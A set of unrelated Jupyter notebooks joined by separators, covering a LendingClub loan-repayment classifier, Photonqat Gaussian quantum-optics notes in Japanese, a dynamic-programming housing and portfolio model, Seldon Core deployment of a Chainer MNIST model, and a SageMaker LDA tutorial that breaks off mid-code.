We will use lending data from 2007-2010 and be trying to classify and predict whether or not the borrower paid back their loan in full.
Here are what the columns represent:
* credit.policy: 1 if the customer meets the credit underwriting criteria of LendingClub.com, and 0 otherwise.
* purpose: The purpose of the loan (takes values "credit_card", "debt_consolidation", "educational", "major_purchase", "small_business", and "all_other").
* int.rate: The interest rate of the loan, as a proportion (a rate of 11% would be stored as 0.11). Borrowers judged by LendingClub.com to be more risky are assigned higher interest rates.
* installment: The monthly installments owed by the borrower if the loan is funded.
* log.annual.inc: The natural log of the self-reported annual income of the borrower.
* dti: The debt-to-income ratio of the borrower (amount of debt divided by annual income).
* fico: The FICO credit score of the borrower.
* days.with.cr.line: The number of days the borrower has had a credit line.
* revol.bal: The borrower's revolving balance (amount unpaid at the end of the credit card billing cycle).
* revol.util: The borrower's revolving line utilization rate (the amount of the credit line used relative to total credit available).
* inq.last.6mths: The borrower's number of inquiries by creditors in the last 6 months.
* delinq.2yrs: The number of times the borrower had been 30+ days past due on a payment in the past 2 years.
* pub.rec: The borrower's number of derogatory public records (bankruptcy filings, tax liens, or judgments).
# Import Libraries
**Import the usual libraries for pandas and plotting.
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
```
## Get the Data
** Use pandas to read loan_data.csv as a dataframe called loans.**
```
loans = pd.read_csv('loan_data.csv')
```
** Check out the info(), head(), and describe() methods on loans.**
```
loans.info()
loans.describe()
loans.head()
```
# Exploratory Data Analysis
** Create a histogram of two FICO distributions on top of each other, one for each credit.policy outcome.**
```
plt.figure(figsize=(10,6))
loans[loans['credit.policy']==1]['fico'].hist(alpha=0.5,bins=30,color='blue',label='Credit.Policy=1')
loans[loans['credit.policy']==0]['fico'].hist(alpha=0.5,bins=30,color='red',label='Credit.Policy=0')
plt.legend()
plt.xlabel('FICO')
```
** Create a similar figure, except this time select by the not.fully.paid column.**
```
plt.figure(figsize=(10,6))
loans[loans['not.fully.paid']==1]['fico'].hist(alpha=0.5,bins=30,color='blue',label='Credit.Policy=1')
loans[loans['not.fully.paid']==0]['fico'].hist(alpha=0.5,bins=30,color='red',label='Credit.Policy=0')
plt.legend()
plt.xlabel('FICO')
```
** Create a countplot using seaborn showing the counts of loans by purpose, with the color hue defined by not.fully.paid. **
```
sns.countplot(x='purpose',data=loans,hue='not.fully.paid')
```
** Let's see the trend between FICO score and interest rate.**
```
sns.jointplot(x='fico',y='int.rate',data=loans,color='purple')
```
** Create the following lmplots to see if the trend differed between not.fully.paid and credit.policy.**
```
sns.lmplot(x='fico',y='int.rate',data=loans,hue='credit.policy',col='not.fully.paid')
```
# Setting up the Data
Let's get ready to set up our data for our Random Forest Classification Model!
**Check loans.info() again.**
```
loans.info()
```
## Categorical Features
Notice that the **purpose** column as categorical
**Create a list of 1 element containing the string 'purpose'. Call this list cat_feats.**
```
cat_feat = ['purpose']
```
**Now use pd.get_dummies(loans,columns=cat_feats,drop_first=True) to create a fixed larger dataframe that has new feature columns with dummy variables. Set this dataframe as final_data.**
```
final_data = pd.get_dummies(loans,columns=cat_feat,drop_first=True)
final_data.info()
```
## Train Test Split
Now its time to split our data into a training set and a testing set!
```
from sklearn.model_selection import train_test_split
X = final_data.drop('not.fully.paid',axis=1)
y = final_data['not.fully.paid']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)
```
## Training a Decision Tree Model
Let's start by training a single decision tree first!
** Import DecisionTreeClassifier**
```
from sklearn.tree import DecisionTreeClassifier
```
**Create an instance of DecisionTreeClassifier() called dtree and fit it to the training data.**
```
dtree = DecisionTreeClassifier()
dtree.fit(X_train,y_train)
```
## Predictions and Evaluation of Decision Tree
**Create predictions from the test set and create a classification report and a confusion matrix.**
```
pred = dtree.predict(X_test)
from sklearn.metrics import classification_report,confusion_matrix
print(classification_report(y_test,pred))
print(confusion_matrix(y_test,pred))
```
## Training the Random Forest model
**Create an instance of the RandomForestClassifier class and fit it to our training data from the previous step.**
```
from sklearn.ensemble import RandomForestClassifier
rfc = RandomForestClassifier(n_estimators=600)
rfc.fit(X_train,y_train)
```
## Predictions and Evaluation
```
pred = rfc.predict(X_test)
```
**Now create a classification report from the results.**
```
print(classification_report(y_test,pred))
```
**Show the Confusion Matrix for the predictions.**
```
print(confusion_matrix(y_test,pred))
```
**What performed better the random forest or the decision tree?**
```
# RandomForestClassifier showed better results but the results are still not good enough, so future engineering is needed
```
|
github_jupyter
|
```
import photonqat as pq
import numpy as np
import matplotlib.pyplot as plt
```
## Photonqat
基本的なゲート動作と測定を一通り行っています。
```
G = pq.Gaussian(2) # two qumode [0, 1]
G.D(0, 2) # Displacement gate, x to x+2
G.S(0, 1) # X squeeIng gate, r=1
G.R(0, np.pi/4) # pi/4 rotation gate
G.BS(0, 1, np.pi/4) # 50:50 beam splitter
x = G.MeasX(1) # Measure mode 1
G.Wigner(0) # plot
print('measured x =', x)
print('mu0 =', G.mean(0)) # mu of qumode 0
print('cov0 =', G.cov(0)) # covarince of qumode 1
```
## 以下、メモ
## Phase space について
N bosonic mode Hilbert space
$\otimes^{N}_{k=1} \mathcal{H}_k$
vectorial operator
$\hat{\mathbf{b}} = (\hat{a}_1, \hat{a}_1^{\dagger}, \dots, \hat{a}_N, \hat{a}_N^{\dagger})$ : 2N elements
bosonic commutation relations
$[\hat{b}_i, \hat{b}_j] = \Omega_{ij}\ \ (i, j = 1, \dots, 2N)$
$\mathbf{\Omega} = \oplus_{k=1}^{N}\omega\ \ \
\omega =
\begin{pmatrix}
0 & 1 \\
-1 & 0 \\
\end{pmatrix}
$
Quadrature field
$\hat{\mathbf{x}} = (\hat{q}_1, \hat{p}_1, \dots, \hat{q}_N, \hat{p}_N)$ : 2N elements
canonical commutation relation
$[\hat{x}_i, \hat{x}_j] = 2i\Omega_{ij}\ \ (i, j = 1, \dots, 2N)$
## 密度演算子とWigner関数
任意の密度演算子$\hat{\rho}$を考える
任意の密度演算子は等価なWigner関数が存在する
Weyl operator
$D(\xi) = \exp(i \hat{x}^T \Omega \hat{\xi})$
これを用いて、Wigner characteristic functionを定義できる
$\chi (\xi) = \mathrm{Tr}[\hat{\rho}D(\xi)]$
Wigner characteristic functionのフーリエ変換がWigner function
$W(\mathbf{x}) = \int_{R^{2N}} \frac{d^{2N}}{(2\pi)^{2N}} \exp{(-i \hat{x}^T \Omega \hat{\xi})} \chi (\xi)$
## 統計量とWigner関数
Wigner functionは統計量でも定義できる
- first moment
$\bar{\mathbf{x}} = \langle \hat{\mathbf{x}} \rangle= \mathrm{Tr}[\hat{\mathbf{x}} \hat{\rho}]$
- second moment
$V_{ij} = \frac{1}{2}\langle \{\Delta\hat{x}_i, \Delta\hat{x}_j \}\rangle$
$\{ A, B \} = AB+BA$
$V_{ii}$は$\hat{x}_i$の分散をあらわす
Gaussian stateは最初の2モーメントだけで完全に記述可能
## Gaussian Unitaryについて
Quadrature operatorにおいては、Gaussian UnitaryはAffien写像で書ける!
$(\mathbf{S}, \mathbf{d}) : \hat{\mathrm{x}}\to \mathbf{S}\mathrm{x} + \mathbf{d}$
Williamson's Theorem
任意の偶数次元の正定値実行列はsimplectic transformで対角化できる
$\mathbf{V} = \mathbf{SV}^{\oplus}\mathbf{S}^{T}$
$\mathbf{V}^{\oplus} = \oplus^{N}_{k=1} \nu_k \mathbf{I}$
## Gaussian Measurement
POVM: $\Pi_i = E_{i}^{\dagger}E_i\ \ \ (\sum_i E_{i}^{\dagger}E_i = I)$
これを連続量に置き換える
Gaussian Measurementとは、Gaussian stateに対して行い、出力結果がGaussian Distributionで、測定しなかったモードはGaussian stateのままである
測定するsubsystemを$\mathbf{B}$として、それ以外のsubsystemを$\mathbf{A}$とする。
測定結果の確率分布:測定モード以外の直交位相を周辺化したGaussian Wigner分布
測定後の状態:以下のようになる.
$\mathbf{V} = \mathbf{A} - \mathbf{C}(\mathbf{\Pi B \Pi})^{-1}\mathbf{C}^T$
$\mathbf{\Pi} = \rm{diag}(1, 0)$ ($\hat{x}$測定の場合)
$\mathbf{\Pi B \Pi}$は非正則。pseudo-inverseを用いる。
$(\mathbf{\Pi B \Pi})^{-1} = B_{11}^{-1}\Pi$
これは多変量ガウス分布の条件付き分布をとるのと基本的に同じ
なので同様に測定後の状態の平均もとれる
$\mathbf{\mu} = \mathbf{\mu_A} - \mathbf{C}(\mathbf{\Pi B \Pi})^{-1}(\mathbf{\mu_B} - x_B\mathbf{\Pi})$
|
github_jupyter
|
### Simple housing version
* State: $[w, n, M, e, \hat{S}, z]$, where $z$ is the stock trading experience, which took value of 0 and 1. And $\hat{S}$ now contains 27 states.
* Action: $[c, b, k, q]$ where $q$ only takes 2 value: $1$ or $\frac{1}{2}$
```
from scipy.interpolate import interpn
from multiprocessing import Pool
from functools import partial
from constant import *
import warnings
warnings.filterwarnings("ignore")
#Define the utility function
def u(c):
return (np.float_power(c, 1-gamma) - 1)/(1 - gamma)
#Define the bequeath function, which is a function of wealth
def uB(tb):
return B*u(tb)
#Calcualte HE
def calHE(x):
# the input x is a numpy array
# w, n, M, e, s, z = x
HE = H*pt - x[:,2]
return HE
#Calculate TB
def calTB(x):
# the input x as a numpy array
# w, n, M, e, s, z = x
TB = x[:,0] + x[:,1] + calHE(x)
return TB
#The reward function
def R(x, a):
'''
Input:
state x: w, n, M, e, s, z
action a: c, b, k, q = a which is a np array
Output:
reward value: the length of return should be equal to the length of a
'''
w, n, M, e, s, z = x
reward = np.zeros(a.shape[0])
# actions with not renting out
nrent_index = (a[:,3]==1)
# actions with renting out
rent_index = (a[:,3]!=1)
# housing consumption not renting out
nrent_Vh = (1+kappa)*H
# housing consumption renting out
rent_Vh = (1-kappa)*(H/2)
# combined consumption with housing consumption
nrent_C = np.float_power(a[nrent_index][:,0], alpha) * np.float_power(nrent_Vh, 1-alpha)
rent_C = np.float_power(a[rent_index][:,0], alpha) * np.float_power(rent_Vh, 1-alpha)
reward[nrent_index] = u(nrent_C)
reward[rent_index] = u(rent_C)
return reward
def transition(x, a, t):
'''
Input: state and action and time, where action is an array
Output: possible future states and corresponding probability
'''
w, n, M, e, s, z = x
s = int(s)
e = int(e)
nX = len(x)
aSize = len(a)
# mortgage payment
m = M/D[T_max-t]
M_next = M*(1+rh) - m
# actions
b = a[:,1]
k = a[:,2]
q = a[:,3]
# transition of z
z_next = np.ones(aSize)
if z == 0:
z_next[k==0] = 0
# we want the output format to be array of all possible future states and corresponding
# probability. x = [w_next, n_next, M_next, e_next, s_next, z_next]
# create the empty numpy array to collect future states and probability
if t >= T_R:
future_states = np.zeros((aSize*nS,nX))
n_next = gn(t, n, x, (r_k+r_b)/2)
future_states[:,0] = np.repeat(b*(1+r_b[s]), nS) + np.repeat(k, nS)*(1+np.tile(r_k, aSize))
future_states[:,1] = np.tile(n_next,aSize)
future_states[:,2] = M_next
future_states[:,3] = 0
future_states[:,4] = np.tile(range(nS),aSize)
future_states[:,5] = np.repeat(z_next,nS)
future_probs = np.tile(Ps[s],aSize)
else:
future_states = np.zeros((2*aSize*nS,nX))
n_next = gn(t, n, x, (r_k+r_b)/2)
future_states[:,0] = np.repeat(b*(1+r_b[s]), 2*nS) + np.repeat(k, 2*nS)*(1+np.tile(r_k, 2*aSize))
future_states[:,1] = np.tile(n_next,2*aSize)
future_states[:,2] = M_next
future_states[:,3] = np.tile(np.repeat([0,1],nS), aSize)
future_states[:,4] = np.tile(range(nS),2*aSize)
future_states[:,5] = np.repeat(z_next,2*nS)
# employed right now:
if e == 1:
future_probs = np.tile(np.append(Ps[s]*Pe[s,e], Ps[s]*(1-Pe[s,e])),aSize)
else:
future_probs = np.tile(np.append(Ps[s]*(1-Pe[s,e]), Ps[s]*Pe[s,e]),aSize)
return future_states, future_probs
# Use to approximate the discrete values in V
class Approxy(object):
def __init__(self, points, Vgrid):
self.V = Vgrid
self.p = points
def predict(self, xx):
pvalues = np.zeros(xx.shape[0])
for e in [0,1]:
for s in range(nS):
for z in [0,1]:
index = (xx[:,3] == e) & (xx[:,4] == s) & (xx[:,5] == z)
pvalues[index]=interpn(self.p, self.V[:,:,:,e,s,z], xx[index][:,:3],
bounds_error = False, fill_value = None)
return pvalues
# used to calculate dot product
def dotProduct(p_next, uBTB, t):
if t >= T_R:
return (p_next*uBTB).reshape((len(p_next)//(nS),(nS))).sum(axis = 1)
else:
return (p_next*uBTB).reshape((len(p_next)//(2*nS),(2*nS))).sum(axis = 1)
# Value function is a function of state and time t < T
def V(x, t, NN):
w, n, M, e, s, z = x
yat = yAT(t,x)
m = M/D[T_max - t]
# If the agent can not pay for the ortgage
if yat + w < m:
return [0, [0,0,0,0,0]]
# The agent can pay for the mortgage
if t == T_max-1:
# The objective functions of terminal state
def obj(actions):
# Not renting out case
# a = [c, b, k, q]
x_next, p_next = transition(x, actions, t)
uBTB = uB(calTB(x_next)) # conditional on being dead in the future
return R(x, actions) + beta * dotProduct(uBTB, p_next, t)
else:
def obj(actions):
# Renting out case
# a = [c, b, k, q]
x_next, p_next = transition(x, actions, t)
V_tilda = NN.predict(x_next) # V_{t+1} conditional on being alive, approximation here
uBTB = uB(calTB(x_next)) # conditional on being dead in the future
return R(x, actions) + beta * (Pa[t] * dotProduct(V_tilda, p_next, t) + (1 - Pa[t]) * dotProduct(uBTB, p_next, t))
def obj_solver(obj):
# Constrain: yat + w - m = c + b + kk
actions = []
budget1 = yat + w - m
for cp in np.linspace(0.001,0.999,11):
c = budget1 * cp
budget2 = budget1 * (1-cp)
#.....................stock participation cost...............
for kp in np.linspace(0,1,11):
# If z == 1 pay for matainance cost Km = 0.5
if z == 1:
# kk is stock allocation
kk = budget2 * kp
if kk > Km:
k = kk - Km
b = budget2 * (1-kp)
else:
k = 0
b = budget2
# If z == 0 and k > 0 payfor participation fee Kc = 5
else:
kk = budget2 * kp
if kk > Kc:
k = kk - Kc
b = budget2 * (1-kp)
else:
k = 0
b = budget2
#..............................................................
# q = 1 not renting in this case
actions.append([c,b,k,1])
# Constrain: yat + w - m + (1-q)*H*pr = c + b + kk
for q in [1,0.5]:
budget1 = yat + w - m + (1-q)*H*pr
for cp in np.linspace(0.001,0.999,11):
c = budget1*cp
budget2 = budget1 * (1-cp)
#.....................stock participation cost...............
for kp in np.linspace(0,1,11):
# If z == 1 pay for matainance cost Km = 0.5
if z == 1:
# kk is stock allocation
kk = budget2 * kp
if kk > Km:
k = kk - Km
b = budget2 * (1-kp)
else:
k = 0
b = budget2
# If z == 0 and k > 0 payfor participation fee Kc = 5
else:
kk = budget2 * kp
if kk > Kc:
k = kk - Kc
b = budget2 * (1-kp)
else:
k = 0
b = budget2
#..............................................................
# i = 0, no housing improvement when renting out
actions.append([c,b,k,q])
actions = np.array(actions)
values = obj(actions)
fun = np.max(values)
ma = actions[np.argmax(values)]
return fun, ma
fun, action = obj_solver(obj)
return np.array([fun, action])
# wealth discretization
ws = np.array([10,25,50,75,100,125,150,175,200,250,500,750,1000,1500,3000])
w_grid_size = len(ws)
# 401k amount discretization
ns = np.array([1, 5, 10, 15, 25, 50, 100, 150, 400, 1000])
n_grid_size = len(ns)
# Mortgage amount
Ms = np.array([0.01*H,0.05*H,0.1*H,0.2*H,0.3*H,0.4*H,0.5*H,0.8*H]) * pt
M_grid_size = len(Ms)
points = (ws,ns,Ms)
# dimentions of the state
dim = (w_grid_size, n_grid_size,M_grid_size,2,nS,2)
dimSize = len(dim)
xgrid = np.array([[w, n, M, e, s, z]
for w in ws
for n in ns
for M in Ms
for e in [0,1]
for s in range(nS)
for z in [0,1]
]).reshape(dim + (dimSize,))
# reshape the state grid into a single line of states to facilitate multiprocessing
xs = xgrid.reshape((np.prod(dim),dimSize))
Vgrid = np.zeros(dim + (T_max,))
cgrid = np.zeros(dim + (T_max,))
bgrid = np.zeros(dim + (T_max,))
kgrid = np.zeros(dim + (T_max,))
qgrid = np.zeros(dim + (T_max,))
print("The size of the housing: ", H)
print("The size of the grid: ", dim + (T_max,))
%%time
# value iteration part, create multiprocesses 32
pool = Pool()
for t in range(T_max-1,T_max-3, -1):
print(t)
if t == T_max - 1:
f = partial(V, t = t, NN = None)
results = np.array(pool.map(f, xs))
else:
approx = Approxy(points,Vgrid[:,:,:,:,:,:,t+1])
f = partial(V, t = t, NN = approx)
results = np.array(pool.map(f, xs))
Vgrid[:,:,:,:,:,:,t] = results[:,0].reshape(dim)
cgrid[:,:,:,:,:,:,t] = np.array([r[0] for r in results[:,1]]).reshape(dim)
bgrid[:,:,:,:,:,:,t] = np.array([r[1] for r in results[:,1]]).reshape(dim)
kgrid[:,:,:,:,:,:,t] = np.array([r[2] for r in results[:,1]]).reshape(dim)
qgrid[:,:,:,:,:,:,t] = np.array([r[3] for r in results[:,1]]).reshape(dim)
pool.close()
```
|
github_jupyter
|
# Chainer MNIST Model Deployment
* Wrap a Chainer MNIST python model for use as a prediction microservice in seldon-core
* Run locally on Docker to test
* Deploy on seldon-core running on minikube
## Dependencies
* [Helm](https://github.com/kubernetes/helm)
* [Minikube](https://github.com/kubernetes/minikube)
* [S2I](https://github.com/openshift/source-to-image)
```bash
pip install seldon-core
pip install chainer==6.2.0
```
## Train locally
```
#!/usr/bin/env python
import argparse
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import training
from chainer.training import extensions
import chainerx
# Network definition
class MLP(chainer.Chain):
def __init__(self, n_units, n_out):
super(MLP, self).__init__()
with self.init_scope():
# the size of the inputs to each layer will be inferred
self.l1 = L.Linear(None, n_units) # n_in -> n_units
self.l2 = L.Linear(None, n_units) # n_units -> n_units
self.l3 = L.Linear(None, n_out) # n_units -> n_out
def forward(self, x):
h1 = F.relu(self.l1(x))
h2 = F.relu(self.l2(h1))
return self.l3(h2)
def main():
parser = argparse.ArgumentParser(description='Chainer example: MNIST')
parser.add_argument('--batchsize', '-b', type=int, default=100,
help='Number of images in each mini-batch')
parser.add_argument('--epoch', '-e', type=int, default=20,
help='Number of sweeps over the dataset to train')
parser.add_argument('--frequency', '-f', type=int, default=-1,
help='Frequency of taking a snapshot')
parser.add_argument('--device', '-d', type=str, default='-1',
help='Device specifier. Either ChainerX device '
'specifier or an integer. If non-negative integer, '
'CuPy arrays with specified device id are used. If '
'negative integer, NumPy arrays are used')
parser.add_argument('--out', '-o', default='result',
help='Directory to output the result')
parser.add_argument('--resume', '-r', type=str,
help='Resume the training from snapshot')
parser.add_argument('--unit', '-u', type=int, default=1000,
help='Number of units')
parser.add_argument('--noplot', dest='plot', action='store_false',
help='Disable PlotReport extension')
group = parser.add_argument_group('deprecated arguments')
group.add_argument('--gpu', '-g', dest='device',
type=int, nargs='?', const=0,
help='GPU ID (negative value indicates CPU)')
args = parser.parse_args(args=[])
device = chainer.get_device(args.device)
print('Device: {}'.format(device))
print('# unit: {}'.format(args.unit))
print('# Minibatch-size: {}'.format(args.batchsize))
print('# epoch: {}'.format(args.epoch))
print('')
# Set up a neural network to train
# Classifier reports softmax cross entropy loss and accuracy at every
# iteration, which will be used by the PrintReport extension below.
model = L.Classifier(MLP(args.unit, 10))
model.to_device(device)
device.use()
# Setup an optimizer
optimizer = chainer.optimizers.Adam()
optimizer.setup(model)
# Load the MNIST dataset
train, test = chainer.datasets.get_mnist()
train_iter = chainer.iterators.SerialIterator(train, args.batchsize)
test_iter = chainer.iterators.SerialIterator(test, args.batchsize,
repeat=False, shuffle=False)
# Set up a trainer
updater = training.updaters.StandardUpdater(
train_iter, optimizer, device=device)
trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.out)
# Evaluate the model with the test dataset for each epoch
trainer.extend(extensions.Evaluator(test_iter, model, device=device))
# Dump a computational graph from 'loss' variable at the first iteration
# The "main" refers to the target link of the "main" optimizer.
# TODO(niboshi): Temporarily disabled for chainerx. Fix it.
if device.xp is not chainerx:
trainer.extend(extensions.DumpGraph('main/loss'))
# Take a snapshot for each specified epoch
frequency = args.epoch if args.frequency == -1 else max(1, args.frequency)
trainer.extend(extensions.snapshot(), trigger=(frequency, 'epoch'))
# Write a log of evaluation statistics for each epoch
trainer.extend(extensions.LogReport())
# Save two plot images to the result dir
if args.plot and extensions.PlotReport.available():
trainer.extend(
extensions.PlotReport(['main/loss', 'validation/main/loss'],
'epoch', file_name='loss.png'))
trainer.extend(
extensions.PlotReport(
['main/accuracy', 'validation/main/accuracy'],
'epoch', file_name='accuracy.png'))
# Print selected entries of the log to stdout
# Here "main" refers to the target link of the "main" optimizer again, and
# "validation" refers to the default name of the Evaluator extension.
# Entries other than 'epoch' are reported by the Classifier link, called by
# either the updater or the evaluator.
trainer.extend(extensions.PrintReport(
['epoch', 'main/loss', 'validation/main/loss',
'main/accuracy', 'validation/main/accuracy', 'elapsed_time']))
# Print a progress bar to stdout
trainer.extend(extensions.ProgressBar())
if args.resume is not None:
# Resume from a snapshot
chainer.serializers.load_npz(args.resume, trainer)
# Run the training
trainer.run()
if __name__ == '__main__':
main()
```
Wrap model using s2i
```
!s2i build . seldonio/seldon-core-s2i-python3:1.3.0-dev chainer-mnist:0.1
!docker run --name "mnist_predictor" -d --rm -p 5000:5000 chainer-mnist:0.1
```
Send some random features that conform to the contract
```
!seldon-core-tester contract.json 0.0.0.0 5000 -p
!docker rm mnist_predictor --force
```
# Test using Minikube
**Due to a [minikube/s2i issue](https://github.com/SeldonIO/seldon-core/issues/253) you will need [s2i >= 1.1.13](https://github.com/openshift/source-to-image/releases/tag/v1.1.13)**
```
!minikube start --memory 4096
```
## Setup Seldon Core
Use the setup notebook to [Setup Cluster](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Setup-Cluster) with [Ambassador Ingress](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Ambassador) and [Install Seldon Core](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Install-Seldon-Core). Instructions [also online](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html).
```
!eval $(minikube docker-env) && s2i build . seldonio/seldon-core-s2i-python3:1.3.0-dev chainer-mnist:0.1
!kubectl create -f chainer_mnist_deployment.json
!kubectl rollout status deploy/chainer-mnist-deployment-chainer-mnist-predictor-76478b2
!seldon-core-api-tester contract.json `minikube ip` `kubectl get svc ambassador -o jsonpath='{.spec.ports[0].nodePort}'` \
seldon-deployment-example --namespace default -p
!minikube delete
```
|
github_jupyter
|
# An Introduction to SageMaker LDA
***Finding topics in synthetic document data using Spectral LDA algorithms.***
---
1. [Introduction](#Introduction)
1. [Setup](#Setup)
1. [Training](#Training)
1. [Inference](#Inference)
1. [Epilogue](#Epilogue)
# Introduction
***
Amazon SageMaker LDA is an unsupervised learning algorithm that attempts to describe a set of observations as a mixture of distinct categories. Latent Dirichlet Allocation (LDA) is most commonly used to discover a user-specified number of topics shared by documents within a text corpus. Here each observation is a document, the features are the presence (or occurrence count) of each word, and the categories are the topics. Since the method is unsupervised, the topics are not specified up front, and are not guaranteed to align with how a human may naturally categorize documents. The topics are learned as a probability distribution over the words that occur in each document. Each document, in turn, is described as a mixture of topics.
In this notebook we will use the Amazon SageMaker LDA algorithm to train an LDA model on some example synthetic data. We will then use this model to classify (perform inference on) the data. The main goals of this notebook are to,
* learn how to obtain and store data for use in Amazon SageMaker,
* create an AWS SageMaker training job on a data set to produce an LDA model,
* use the LDA model to perform inference with an Amazon SageMaker endpoint.
The following are ***not*** goals of this notebook:
* understand the LDA model,
* understand how the Amazon SageMaker LDA algorithm works,
* interpret the meaning of the inference output
If you would like to know more about these things take a minute to run this notebook and then check out the SageMaker LDA Documentation and the **LDA-Science.ipynb** notebook.
```
%matplotlib inline
import os, re
import boto3
import matplotlib.pyplot as plt
import numpy as np
np.set_printoptions(precision=3, suppress=True)
# some helpful utility functions are defined in the Python module
# "generate_example_data" located in the same directory as this
# notebook
from generate_example_data import generate_griffiths_data, plot_lda, match_estimated_topics
# accessing the SageMaker Python SDK
import sagemaker
from sagemaker.amazon.common import RecordSerializer
from sagemaker.serializers import CSVSerializer
from sagemaker.deserializers import JSONDeserializer
```
# Setup
***
*This notebook was created and tested on an ml.m4.xlarge notebook instance.*
Before we do anything at all, we need data! We also need to setup our AWS credentials so that AWS SageMaker can store and access data. In this section we will do four things:
1. [Setup AWS Credentials](#SetupAWSCredentials)
1. [Obtain Example Dataset](#ObtainExampleDataset)
1. [Inspect Example Data](#InspectExampleData)
1. [Store Data on S3](#StoreDataonS3)
## Setup AWS Credentials
We first need to specify some AWS credentials; specifically data locations and access roles. This is the only cell of this notebook that you will need to edit. In particular, we need the following data:
* `bucket` - An S3 bucket accessible by this account.
* Used to store input training data and model data output.
* Should be within the same region as this notebook instance, training, and hosting.
* `prefix` - The location in the bucket where this notebook's input and and output data will be stored. (The default value is sufficient.)
* `role` - The IAM Role ARN used to give training and hosting access to your data.
* See documentation on how to create these.
* The script below will try to determine an appropriate Role ARN.
```
from sagemaker import get_execution_role
session = sagemaker.Session()
role = get_execution_role()
bucket = session.default_bucket()
prefix = "sagemaker/DEMO-lda-introduction"
print("Training input/output will be stored in {}/{}".format(bucket, prefix))
print("\nIAM Role: {}".format(role))
```
## Obtain Example Data
We generate some example synthetic document data. For the purposes of this notebook we will omit the details of this process. All we need to know is that each piece of data, commonly called a *"document"*, is a vector of integers representing *"word counts"* within the document. In this particular example there are a total of 25 words in the *"vocabulary"*.
$$
\underbrace{w}_{\text{document}} = \overbrace{\big[ w_1, w_2, \ldots, w_V \big] }^{\text{word counts}},
\quad
V = \text{vocabulary size}
$$
These data are based on that used by Griffiths and Steyvers in their paper [Finding Scientific Topics](http://psiexp.ss.uci.edu/research/papers/sciencetopics.pdf). For more information, see the **LDA-Science.ipynb** notebook.
```
print("Generating example data...")
num_documents = 6000
num_topics = 5
known_alpha, known_beta, documents, topic_mixtures = generate_griffiths_data(
num_documents=num_documents, num_topics=num_topics
)
vocabulary_size = len(documents[0])
# separate the generated data into training and tests subsets
num_documents_training = int(0.9 * num_documents)
num_documents_test = num_documents - num_documents_training
documents_training = documents[:num_documents_training]
documents_test = documents[num_documents_training:]
topic_mixtures_training = topic_mixtures[:num_documents_training]
topic_mixtures_test = topic_mixtures[num_documents_training:]
print("documents_training.shape = {}".format(documents_training.shape))
print("documents_test.shape = {}".format(documents_test.shape))
```
## Inspect Example Data
*What does the example data actually look like?* Below we print an example document as well as its corresponding known *topic-mixture*. A topic-mixture serves as the "label" in the LDA model. It describes the ratio of topics from which the words in the document are found.
For example, if the topic mixture of an input document $\mathbf{w}$ is,
$$\theta = \left[ 0.3, 0.2, 0, 0.5, 0 \right]$$
then $\mathbf{w}$ is 30% generated from the first topic, 20% from the second topic, and 50% from the fourth topic. For more information see **How LDA Works** in the SageMaker documentation as well as the **LDA-Science.ipynb** notebook.
Below, we compute the topic mixtures for the first few training documents. As we can see, each document is a vector of word counts from the 25-word vocabulary and its topic-mixture is a probability distribution across the five topics used to generate the sample dataset.
```
print("First training document =\n{}".format(documents[0]))
print("\nVocabulary size = {}".format(vocabulary_size))
print("Known topic mixture of first document =\n{}".format(topic_mixtures_training[0]))
print("\nNumber of topics = {}".format(num_topics))
print("Sum of elements = {}".format(topic_mixtures_training[0].sum()))
```
Later, when we perform inference on the training data set we will compare the inferred topic mixture to this known one.
---
Human beings are visual creatures, so it might be helpful to come up with a visual representation of these documents. In the below plots, each pixel of a document represents a word. The greyscale intensity is a measure of how frequently that word occurs. Below we plot the first few documents of the training set reshaped into 5x5 pixel grids.
```
%matplotlib inline
fig = plot_lda(documents_training, nrows=3, ncols=4, cmap="gray_r", with_colorbar=True)
fig.suptitle("Example Document Word Counts")
fig.set_dpi(160)
```
## Store Data on S3
A SageMaker training job needs access to training data stored in an S3 bucket. Although training can accept data of various formats we convert the documents MXNet RecordIO Protobuf format before uploading to the S3 bucket defined at the beginning of this notebook. We do so by making use of the SageMaker Python SDK utility `RecordSerializer`.
```
# convert documents_training to Protobuf RecordIO format
recordio_protobuf_serializer = RecordSerializer()
fbuffer = recordio_protobuf_serializer.serialize(documents_training)
# upload to S3 in bucket/prefix/train
fname = "lda.data"
s3_object = os.path.join(prefix, "train", fname)
boto3.Session().resource("s3").Bucket(bucket).Object(s3_object).upload_fileobj(fbuffer)
s3_train_data = "s3://{}/{}".format(bucket, s3_object)
print("Uploaded data to S3: {}".format(s3_train_data))
```
# Training
***
Once the data is preprocessed and available in a recommended format the next step is to train our model on the data. There are number of parameters required by SageMaker LDA configuring the model and defining the computational environment in which training will take place.
First, we specify a Docker container containing the SageMaker LDA algorithm. For your convenience, a region-specific container is automatically chosen for you to minimize cross-region data communication. Information about the locations of each SageMaker algorithm is available in the documentation.
```
from sagemaker.amazon.amazon_estimator import get_image_uri
# select the algorithm container based on this notebook's current location
region_name = boto3.Session().region_name
container = get_image_uri(region_name, "lda")
print("Using SageMaker LDA container: {} ({})".format(container, region_name))
```
Particular to a SageMaker LDA training job are the following hyperparameters:
* **`num_topics`** - The number of topics or categories in the LDA model.
* Usually, this is not known a priori.
* In this example, howevever, we know that the data is generated by five topics.
* **`feature_dim`** - The size of the *"vocabulary"*, in LDA parlance.
* In this example, this is equal 25.
* **`mini_batch_size`** - The number of input training documents.
* **`alpha0`** - *(optional)* a measurement of how "mixed" are the topic-mixtures.
* When `alpha0` is small the data tends to be represented by one or few topics.
* When `alpha0` is large the data tends to be an even combination of several or many topics.
* The default value is `alpha0 = 1.0`.
In addition to these LDA model hyperparameters, we provide additional parameters defining things like the EC2 instance type on which training will run, the S3 bucket containing the data, and the AWS access role. Note that,
* Recommended instance type: `ml.c4`
* Current limitations:
* SageMaker LDA *training* can only run on a single instance.
* SageMaker LDA does not take advantage of GPU hardware.
* (The Amazon AI Algorithms team is working hard to provide these capabilities in a future release!)
```
# specify general training job information
lda = sagemaker.estimator.Estimator(
container,
role,
